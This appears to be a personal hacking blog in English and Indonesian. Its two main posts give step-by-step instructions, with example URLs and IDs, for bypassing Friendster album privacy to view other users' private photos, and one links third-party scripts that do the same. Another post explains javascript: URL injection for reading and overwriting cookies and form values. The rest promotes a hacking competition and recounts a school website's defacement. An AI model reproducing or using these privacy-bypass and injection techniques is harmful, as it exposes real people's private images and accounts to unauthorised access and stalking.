[NEW] Hacking Friendster Private Photo Part 2

Tomorrow when i look in internet, i found some interesting site. In that site,they give script to see friendster private photos.. Just open url bellow and enter the friendster target uid, and you can see the private photo that contain in that uid.

The URL are :

http://www.pusatbokep.com/FS.php

OR

http://www.pusatbokep.com/FS2.php

Hope usefull for you all..^^

[NEW] Hacking Private Photo Friendster

In FRIENDSTER, some people can hide some photos that they upload into friendster albums. Usually this photos is private picture or something like secret picture. If we want to see that picture, we must ask permission from the owner..
2 days ago, i found some hacking into this private photo, so we can see private photos from other people friendster account..
The 3 things that you must do to see the private photo is
1. target uid

example : http://www.friendster.com/53349334

41082848 - is target UID ( it's just example, so find your target first )

2. target album id write this address into your addressbar http://www.friendster.com/viewalbums.php?uid="Your target uid here"

example : http://www.friendster.com/viewalbums.php?uid=53349334

Select View - Page Source from the browser menu, and then find "abAlbumPrivacy" near the word private

example :

 "abAlbumPrivacy-1" -- all you need is the number in the end of word,
in this case the number is 1 ( one )  

3. Open
http://www.friendster.com/photolist_ajax.php?uid="your target uid here"&a="album privacy id here"&page=0

example :
http://www.friendster.com/photolist_ajax.php?uid=53349334&a=1&page=0

You will get result like this..

{"photos":[{"isPrimary":"0","privacy":"1","pid":"1","rid":"851208344","album_id":"1","guid":"b799e48214..etc.

All you need is "rid":"851208344" -- remember the number "851208344" this is the photo id .

After the three thing finished, go back to the http://www.friendster.com/viewalbums.php?uid=53349334

right click on one of the image that apear, and then choose properties. See under the image properties

location : ....

example :

location : http://photos-p.friendster.com/photos/43/39/53349334/1_363513051m.jpg

Copy the url into your address bar, and then replace the name of image with number that you got before..

example :

before - http://photos-p.friendster.com/photos/43/39/53349334/1_363513051m.jpg

the name of image is 1_363513051m.jpg, replace 363513051m with "851208344" that you get from "rid":"851208344", so now become 1_851208344.jpg

after - http://photos-p.friendster.com/photos/43/39/53349334/1_851208344.jpg

Now you will see the private photos..^^

NB : if your target have more than one private photos, they must be have more than "rid":"851208344" texts, just search the other number than "851208344" and do the last process in this article again.. Just use your brain.. =p

Javascript Injection

Javascript injection memeang tidak setenar php injection, namun kadang metode ini dibutuhkan. Pada artikel ini akan dibahas sekilas tentang bagaimana melakukan javascript injection secara sederhana.
Untuk melakukan javascript injection lebih mudah bila menggunakan browser opera, karena browser ini memiliki fitur-fitur yang lengkap untuk urusan "begini" =P

* Menampilkan dan menulis sebuah cookie
Kadang kala sebuah website membuat cookie nya dengan javascript, nah untuk melihat cookie tersebut tanpa memanfaatkan fasilitas browser, kita dapat menggunakan perintah ini di url
-javascript:alert(document.cookie);
perintah `alert(..)` diatas digunakan untuk menampilkan sebuah popup box yang berisi cookie yang ada pada website tersebut.

sedangkan untuk mengganti cookie tersebut, kita dapat menggunakan perintah
-javascript:void(document.cookie="...");

*cara seperti diatas dapat juga digunakan untuk mengubah atau menampilkan value yang ada di form
co.

menampilkan
-javascript:alert(document.contoh.pass.value);

mengubah
-javascript:void(document.contoh.pass.value="345");


Jika anda menggunakan browser opera, semua ini dapat dilakukan dengan mudah. Cukup tampilkan source dari web tersebut kemudian tuliskan javascript yang ingin anda jalankan pada sesudah tag lalu pilih apply changes.
co.
1. anda ingin mengganti cookie dari suatu web, tulislah pada tag



2. anda ingin mengganti value dari field pada suatu form seperti contoh di atas



3. anda ingin mengganti referrer



Setelah di apply changes, maka website target anda telah dalam keadaan menjalankan javascript yang telah anda masukan tadi.

yup, itu sekilas dasar-dasar dari javascript injection. Jika tertarik lebih jauh anda bisa cari-cari referensi dari uncle google..^^

PANHAC2

wah2.. bentar lagi ada PANHAC2 neh.. Pazia Acer National Hacker Competition 2
Yang ikut kayanya jago-jago neh.. ada kompetisi onlinenya juga. Seperti tahun yang lalu, kali ini juga berhadiah laptop.
lagi ga ada inspirasi mo nulis apaan di blog, jadi ikutan promosi deh.. wakakaka...

www.sman78.com diacak-acak

baru-baru ini www.sman78.com diacak-acak abis...>.<
parah banget,kacian tuh adminnya.. menurut etika kan " ga mendeface web bangsa sendiri"...
kemarin lusa,ak coba liat-liat webnya,adminnya jadi banyak banget..:p
hari ini ak coba lagi,webnya ga bisa diakses,entah karena down atau gimana aku ga tau..:)
bugnya di phpnuke,bisa dilihat di www.jasakom.com..
yang pasti memang "menyerang lebih mudah dari pada bertahan" ..^^